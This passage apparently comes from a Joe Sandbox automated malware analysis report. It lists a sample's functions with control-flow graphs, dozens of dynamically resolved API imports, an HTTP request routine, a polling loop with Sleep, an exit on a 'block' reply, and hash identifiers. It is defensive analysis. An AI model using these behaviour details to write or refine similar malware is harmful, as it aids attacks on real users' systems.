                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 623f1393379af15adc309e0f4262399c80baccfa342e10ff6e9eb13e9ce3dcb4
                        • Instruction ID: 075010d735f2cdeabc50c3e38a19e7de821d49dafbac9e6a2e8e22ed74e1ffc6
                        • Opcode Fuzzy Hash: 623f1393379af15adc309e0f4262399c80baccfa342e10ff6e9eb13e9ce3dcb4
                        • Instruction Fuzzy Hash: 2CD05E7490130CDBCB04DFE0D8496DDBB78FB08312F200695D90562340EA305481CAA6
                        Function 006A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 6a9c10-6a9c1a 634 6a9c20-6aa031 GetProcAddress * 43 633->634 635 6aa036-6aa0ca LoadLibraryA * 8 633->635 634->635 636 6aa0cc-6aa141 GetProcAddress * 5 635->636 637 6aa146-6aa14d 635->637 636->637 638 6aa153-6aa211 GetProcAddress * 8 637->638 639 6aa216-6aa21d 637->639 638->639 640 6aa298-6aa29f 639->640 641 6aa21f-6aa293 GetProcAddress * 5 639->641 642 6aa337-6aa33e 640->642 643 6aa2a5-6aa332 GetProcAddress * 6 640->643 641->640 644 6aa41f-6aa426 642->644 645 6aa344-6aa41a GetProcAddress * 9 642->645 643->642 646 6aa428-6aa49d GetProcAddress * 5 644->646 647 6aa4a2-6aa4a9 644->647 645->644 646->647 648 6aa4ab-6aa4d7 GetProcAddress * 2 647->648 649 6aa4dc-6aa4e3 647->649 648->649 650 6aa515-6aa51c 649->650 651 6aa4e5-6aa510 GetProcAddress * 2 649->651 652 6aa612-6aa619 650->652 653 6aa522-6aa60d GetProcAddress * 10 650->653 651->650 654 6aa61b-6aa678 GetProcAddress * 4 652->654 655 6aa67d-6aa684 652->655 653->652 654->655 656 6aa69e-6aa6a5 655->656 657 6aa686-6aa699 GetProcAddress 655->657 658 6aa708-6aa709 656->658 659 6aa6a7-6aa703 GetProcAddress * 4 656->659 657->656 659->658
                        APIs
                        • GetProcAddress.KERNEL32(75900000,01255260), ref: 006A9C2D
                        • GetProcAddress.KERNEL32(75900000,012551C0), ref: 006A9C45
                        • GetProcAddress.KERNEL32(75900000,01269630), ref: 006A9C5E
                        • GetProcAddress.KERNEL32(75900000,01269618), ref: 006A9C76
                        • GetProcAddress.KERNEL32(75900000,0126DFB0), ref: 006A9C8E
                        • GetProcAddress.KERNEL32(75900000,0126DEF0), ref: 006A9CA7
                        • GetProcAddress.KERNEL32(75900000,0125BB20), ref: 006A9CBF
                        • GetProcAddress.KERNEL32(75900000,0126E070), ref: 006A9CD7
                        • GetProcAddress.KERNEL32(75900000,0126E028), ref: 006A9CF0
                        • GetProcAddress.KERNEL32(75900000,0126E088), ref: 006A9D08
                        • GetProcAddress.KERNEL32(75900000,0126E0B8), ref: 006A9D20
                        • GetProcAddress.KERNEL32(75900000,012551E0), ref: 006A9D39
                        • GetProcAddress.KERNEL32(75900000,01255220), ref: 006A9D51
                        • GetProcAddress.KERNEL32(75900000,01255300), ref: 006A9D69
                        • GetProcAddress.KERNEL32(75900000,012552A0), ref: 006A9D82
                        • GetProcAddress.KERNEL32(75900000,0126DFF8), ref: 006A9D9A
                        • GetProcAddress.KERNEL32(75900000,0126E040), ref: 006A9DB2
                        • GetProcAddress.KERNEL32(75900000,0125BBC0), ref: 006A9DCB
                        • GetProcAddress.KERNEL32(75900000,01255360), ref: 006A9DE3
                        • GetProcAddress.KERNEL32(75900000,0126E0A0), ref: 006A9DFB
                        • GetProcAddress.KERNEL32(75900000,0126E0D0), ref: 006A9E14
                        • GetProcAddress.KERNEL32(75900000,0126DFC8), ref: 006A9E2C
                        • GetProcAddress.KERNEL32(75900000,0126DE48), ref: 006A9E44
                        • GetProcAddress.KERNEL32(75900000,01255380), ref: 006A9E5D
                        • GetProcAddress.KERNEL32(75900000,0126DF38), ref: 006A9E75
                        • GetProcAddress.KERNEL32(75900000,0126E058), ref: 006A9E8D
                        • GetProcAddress.KERNEL32(75900000,0126DF98), ref: 006A9EA6
                        • GetProcAddress.KERNEL32(75900000,0126DEA8), ref: 006A9EBE
                        • GetProcAddress.KERNEL32(75900000,0126DEC0), ref: 006A9ED6
                        • GetProcAddress.KERNEL32(75900000,0126E0E8), ref: 006A9EEF
                        • GetProcAddress.KERNEL32(75900000,0126E100), ref: 006A9F07
                        • GetProcAddress.KERNEL32(75900000,0126DE60), ref: 006A9F1F
                        • GetProcAddress.KERNEL32(75900000,0126DF68), ref: 006A9F38
                        • GetProcAddress.KERNEL32(75900000,0126B8E8), ref: 006A9F50
                        • GetProcAddress.KERNEL32(75900000,0126DF80), ref: 006A9F68
                        • GetProcAddress.KERNEL32(75900000,0126E118), ref: 006A9F81
                        • GetProcAddress.KERNEL32(75900000,012553A0), ref: 006A9F99
                        • GetProcAddress.KERNEL32(75900000,0126E130), ref: 006A9FB1
                        • GetProcAddress.KERNEL32(75900000,012553E0), ref: 006A9FCA
                        • GetProcAddress.KERNEL32(75900000,0126DE78), ref: 006A9FE2
                        • GetProcAddress.KERNEL32(75900000,0126E010), ref: 006A9FFA
                        • GetProcAddress.KERNEL32(75900000,01255180), ref: 006AA013
                        • GetProcAddress.KERNEL32(75900000,01254DC0), ref: 006AA02B
                        • LoadLibraryA.KERNEL32(0126DE90,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA03D
                        • LoadLibraryA.KERNEL32(0126DFE0,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA04E
                        • LoadLibraryA.KERNEL32(0126DED8,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA060
                        • LoadLibraryA.KERNEL32(0126DF08,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA072
                        • LoadLibraryA.KERNEL32(0126DF20,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA083
                        • LoadLibraryA.KERNEL32(0126DF50,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA095
                        • LoadLibraryA.KERNEL32(0126E1F0,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA0A7
                        • LoadLibraryA.KERNEL32(0126E298,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA0B8
                        • GetProcAddress.KERNEL32(75FD0000,01255140), ref: 006AA0DA
                        • GetProcAddress.KERNEL32(75FD0000,0126E190), ref: 006AA0F2
                        • GetProcAddress.KERNEL32(75FD0000,01269050), ref: 006AA10A
                        • GetProcAddress.KERNEL32(75FD0000,0126E250), ref: 006AA123
                        • GetProcAddress.KERNEL32(75FD0000,01254F40), ref: 006AA13B
                        • GetProcAddress.KERNEL32(734B0000,0125BA08), ref: 006AA160
                        • GetProcAddress.KERNEL32(734B0000,01255120), ref: 006AA179
                        • GetProcAddress.KERNEL32(734B0000,0125B828), ref: 006AA191
                        • GetProcAddress.KERNEL32(734B0000,0126E268), ref: 006AA1A9
                        • GetProcAddress.KERNEL32(734B0000,0126E280), ref: 006AA1C2
                        • GetProcAddress.KERNEL32(734B0000,01254F00), ref: 006AA1DA
                        • GetProcAddress.KERNEL32(734B0000,01254EC0), ref: 006AA1F2
                        • GetProcAddress.KERNEL32(734B0000,0126E3A0), ref: 006AA20B
                        • GetProcAddress.KERNEL32(763B0000,01254EA0), ref: 006AA22C
                        • GetProcAddress.KERNEL32(763B0000,012550A0), ref: 006AA244
                        • GetProcAddress.KERNEL32(763B0000,0126E400), ref: 006AA25D
                        • GetProcAddress.KERNEL32(763B0000,0126E2F8), ref: 006AA275
                        • GetProcAddress.KERNEL32(763B0000,01254F60), ref: 006AA28D
                        • GetProcAddress.KERNEL32(750F0000,0125B800), ref: 006AA2B3
                        • GetProcAddress.KERNEL32(750F0000,0125B670), ref: 006AA2CB
                        • GetProcAddress.KERNEL32(750F0000,0126E358), ref: 006AA2E3
                        • GetProcAddress.KERNEL32(750F0000,01254E20), ref: 006AA2FC
                        • GetProcAddress.KERNEL32(750F0000,01255060), ref: 006AA314
                        • GetProcAddress.KERNEL32(750F0000,0125B990), ref: 006AA32C
                        • GetProcAddress.KERNEL32(75A50000,0126E1A8), ref: 006AA352
                        • GetProcAddress.KERNEL32(75A50000,01254E40), ref: 006AA36A
                        • GetProcAddress.KERNEL32(75A50000,01269010), ref: 006AA382
                        • GetProcAddress.KERNEL32(75A50000,0126E3B8), ref: 006AA39B
                        • GetProcAddress.KERNEL32(75A50000,0126E1D8), ref: 006AA3B3
                        • GetProcAddress.KERNEL32(75A50000,01254F80), ref: 006AA3CB
                        • GetProcAddress.KERNEL32(75A50000,01254FA0), ref: 006AA3E4
                        • GetProcAddress.KERNEL32(75A50000,0126E370), ref: 006AA3FC
                        • GetProcAddress.KERNEL32(75A50000,0126E208), ref: 006AA414
                        • GetProcAddress.KERNEL32(75070000,01254FC0), ref: 006AA436
                        • GetProcAddress.KERNEL32(75070000,0126E148), ref: 006AA44E
                        • GetProcAddress.KERNEL32(75070000,0126E3D0), ref: 006AA466
                        • GetProcAddress.KERNEL32(75070000,0126E3E8), ref: 006AA47F
                        • GetProcAddress.KERNEL32(75070000,0126E2B0), ref: 006AA497
                        • GetProcAddress.KERNEL32(74E50000,01254E60), ref: 006AA4B8
                        • GetProcAddress.KERNEL32(74E50000,01254DE0), ref: 006AA4D1
                        • GetProcAddress.KERNEL32(75320000,01255100), ref: 006AA4F2
                        • GetProcAddress.KERNEL32(75320000,0126E2C8), ref: 006AA50A
                        • GetProcAddress.KERNEL32(6F060000,012550C0), ref: 006AA530
                        • GetProcAddress.KERNEL32(6F060000,01254FE0), ref: 006AA548
                        • GetProcAddress.KERNEL32(6F060000,01255000), ref: 006AA560
                        • GetProcAddress.KERNEL32(6F060000,0126E160), ref: 006AA579
                        • GetProcAddress.KERNEL32(6F060000,01254E80), ref: 006AA591
                        • GetProcAddress.KERNEL32(6F060000,01254F20), ref: 006AA5A9
                        • GetProcAddress.KERNEL32(6F060000,01255020), ref: 006AA5C2
                        • GetProcAddress.KERNEL32(6F060000,01255080), ref: 006AA5DA
                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 006AA5F1
                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 006AA607
                        • GetProcAddress.KERNEL32(74E00000,0126E220), ref: 006AA629
                        • GetProcAddress.KERNEL32(74E00000,01269070), ref: 006AA641
                        • GetProcAddress.KERNEL32(74E00000,0126E2E0), ref: 006AA659
                        • GetProcAddress.KERNEL32(74E00000,0126E418), ref: 006AA672
                        • GetProcAddress.KERNEL32(74DF0000,01255040), ref: 006AA693
                        • GetProcAddress.KERNEL32(6E520000,0126E430), ref: 006AA6B4
                        • GetProcAddress.KERNEL32(6E520000,012550E0), ref: 006AA6CD
                        • GetProcAddress.KERNEL32(6E520000,0126E178), ref: 006AA6E5
                        • GetProcAddress.KERNEL32(6E520000,0126E340), ref: 006AA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 78c09b81222a163bebe2a74e5d3a6b22fc5e75adbe442935a160a9d158c77b44
                        • Instruction ID: e62769a4b801fdf147d7b7870c898247c056fdd9269ca833f2a4afc0d3ff64f2
                        • Opcode Fuzzy Hash: 78c09b81222a163bebe2a74e5d3a6b22fc5e75adbe442935a160a9d158c77b44
                        • Instruction Fuzzy Hash: 7F624AB5602241AFC74CDFA9FD889663BF9F74C301734872BAA49C3264D7399941DB22
                        Function 00696280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 696280-69630b call 6aa7a0 call 6947b0 call 6aa740 InternetOpenA StrCmpCA 1040 69630d 1033->1040 1041 696314-696318 1033->1041 1040->1041 1042 696509-696525 call 6aa7a0 call 6aa800 * 2 1041->1042 1043 69631e-696342 InternetConnectA 1041->1043 1061 696528-69652d 1042->1061 1044 696348-69634c 1043->1044 1045 6964ff-696503 InternetCloseHandle 1043->1045 1047 69635a 1044->1047 1048 69634e-696358 1044->1048 1045->1042 1050 696364-696392 HttpOpenRequestA 1047->1050 1048->1050 1052 696398-69639c 1050->1052 1053 6964f5-6964f9 InternetCloseHandle 1050->1053 1055 69639e-6963bf InternetSetOptionA 1052->1055 1056 6963c5-696405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1059 69642c-69644b call 6a8940 1056->1059 1060 696407-696427 call 6aa740 call 6aa800 * 2 1056->1060 1066 6964c9-6964e9 call 6aa740 call 6aa800 * 2 1059->1066 1067 69644d-696454 1059->1067 1060->1061 1066->1061 1070 6964c7-6964ef InternetCloseHandle 1067->1070 1071 696456-696480 InternetReadFile 1067->1071 1070->1053 1075 69648b 1071->1075 1076 696482-696489 1071->1076 1075->1070 1076->1075 1080 69648d-6964c5 call 6aa9b0 call 6aa8a0 call 6aa800 1076->1080 1080->1071
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                          • Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
                        • StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00696385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006963FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0069646D
                        • InternetCloseHandle.WININET(00000000), ref: 006964EF
                        • InternetCloseHandle.WININET(00000000), ref: 006964F9
                        • InternetCloseHandle.WININET(00000000), ref: 00696503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: cd43b02c615158f446e4c637072bc12ef4b37cec17e8c58003780fa1c8f5295d
                        • Instruction ID: 42940420df6eaeb7465e7e40fe4235d06442b346400c8e8ef7f7c02aa619dab1
                        • Opcode Fuzzy Hash: cd43b02c615158f446e4c637072bc12ef4b37cec17e8c58003780fa1c8f5295d
                        • Instruction Fuzzy Hash: 88715B71A00318ABDF64EBE0CC49BEE77BABB45700F108199F50A6B590DBB46E85CF51
                        Function 006A5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 6a5510-6a5577 call 6a5ad0 call 6aa820 * 3 call 6aa740 * 4 1106 6a557c-6a5583 1090->1106 1107 6a55d7-6a564c call 6aa740 * 2 call 691590 call 6a52c0 call 6aa8a0 call 6aa800 call 6aaad0 StrCmpCA 1106->1107 1108 6a5585-6a55b6 call 6aa820 call 6aa7a0 call 691590 call 6a51f0 1106->1108 1134 6a5693-6a56a9 call 6aaad0 StrCmpCA 1107->1134 1138 6a564e-6a568e call 6aa7a0 call 691590 call 6a51f0 call 6aa8a0 call 6aa800 1107->1138 1124 6a55bb-6a55d2 call 6aa8a0 call 6aa800 1108->1124 1124->1134 1139 6a56af-6a56b6 1134->1139 1140 6a57dc-6a5844 call 6aa8a0 call 6aa820 * 2 call 691670 call 6aa800 * 4 call 6a6560 call 691550 1134->1140 1138->1134 1143 6a57da-6a585f call 6aaad0 StrCmpCA 1139->1143 1144 6a56bc-6a56c3 1139->1144 1270 6a5ac3-6a5ac6 1140->1270 1163 6a5991-6a59f9 call 6aa8a0 call 6aa820 * 2 call 691670 call 6aa800 * 4 call 6a6560 call 691550 1143->1163 1164 6a5865-6a586c 1143->1164 1148 6a571e-6a5793 call 6aa740 * 2 call 691590 call 6a52c0 call 6aa8a0 call 6aa800 call 6aaad0 StrCmpCA 1144->1148 1149 6a56c5-6a5719 call 6aa820 call 6aa7a0 call 691590 call 6a51f0 call 6aa8a0 call 6aa800 1144->1149 1148->1143 1249 6a5795-6a57d5 call 6aa7a0 call 691590 call 6a51f0 call 6aa8a0 call 6aa800 1148->1249 1149->1143 1163->1270 1170 6a598f-6a5a14 call 6aaad0 StrCmpCA 1164->1170 1171 6a5872-6a5879 1164->1171 1199 6a5a28-6a5a91 call 6aa8a0 call 6aa820 * 2 call 691670 call 6aa800 * 4 call 6a6560 call 691550 1170->1199 1200 6a5a16-6a5a21 Sleep 1170->1200 1178 6a587b-6a58ce call 6aa820 call 6aa7a0 call 691590 call 6a51f0 call 6aa8a0 call 6aa800 1171->1178 1179 6a58d3-6a5948 call 6aa740 * 2 call 691590 call 6a52c0 call 6aa8a0 call 6aa800 call 6aaad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 6a594a-6a598a call 6aa7a0 call 691590 call 6a51f0 call 6aa8a0 call 6aa800 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                        APIs
                          • Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
                          • Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5857
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5228
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5318
                          • Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A532F
                          • Part of subcall function 006A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 006A5364
                          • Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A5383
                          • Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 006A5A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 35c198e61aea0afa3b519abd2a3ca4fe855ad123ee7c276cade93326aeaf9ffb
                        • Instruction ID: 804c03c5f368dacde76bad10e93c683e6ab4e23c03cb2280c0fcb0ea65f367ba
                        • Opcode Fuzzy Hash: 35c198e61aea0afa3b519abd2a3ca4fe855ad123ee7c276cade93326aeaf9ffb
                        • Instruction Fuzzy Hash: 0CE12071910104AACB98FBE0DC52AFE737AAF56300F50856EB50766191EF34AE09CF96
                        Function 006A17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 6a17a0-6a17cd call 6aaad0 StrCmpCA 1304 6a17cf-6a17d1 ExitProcess 1301->1304 1305 6a17d7-6a17f1 call 6aaad0 1301->1305 1309 6a17f4-6a17f8 1305->1309 1310 6a17fe-6a1811 1309->1310 1311 6a19c2-6a19cd call 6aa800 1309->1311 1312 6a199e-6a19bd 1310->1312 1313 6a1817-6a181a 1310->1313 1312->1309 1315 6a1849-6a1858 call 6aa820 1313->1315 1316 6a18cf-6a18e0 StrCmpCA 1313->1316 1317 6a198f-6a1999 call 6aa820 1313->1317 1318 6a18ad-6a18be StrCmpCA 1313->1318 1319 6a1821-6a1830 call 6aa820 1313->1319 1320 6a187f-6a1890 StrCmpCA 1313->1320 1321 6a185d-6a186e StrCmpCA 1313->1321 1322 6a1932-6a1943 StrCmpCA 1313->1322 1323 6a1913-6a1924 StrCmpCA 1313->1323 1324 6a1970-6a1981 StrCmpCA 1313->1324 1325 6a18f1-6a1902 StrCmpCA 1313->1325 1326 6a1951-6a1962 StrCmpCA 1313->1326 1327 6a1835-6a1844 call 6aa820 1313->1327 1315->1312 1331 6a18ec 1316->1331 1332 6a18e2-6a18e5 1316->1332 1317->1312 1329 6a18ca 1318->1329 1330 6a18c0-6a18c3 1318->1330 1319->1312 1350 6a189e-6a18a1 1320->1350 1351 6a1892-6a189c 1320->1351 1348 6a187a 1321->1348 1349 6a1870-6a1873 1321->1349 1337 6a194f 1322->1337 1338 6a1945-6a1948 1322->1338 1335 6a1930 1323->1335 1336 6a1926-6a1929 1323->1336 1342 6a198d 1324->1342 1343 6a1983-6a1986 1324->1343 1333 6a190e 1325->1333 1334 6a1904-6a1907 1325->1334 1339 6a196e 1326->1339 1340 6a1964-6a1967 1326->1340 1327->1312 1329->1312 1330->1329 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1312 1338->1337 1339->1312 1340->1339 1342->1312 1343->1342 1348->1312 1349->1348 1352 6a18a8 1350->1352 1351->1352 1352->1312
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 006A17C5
                        • ExitProcess.KERNEL32 ref: 006A17D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
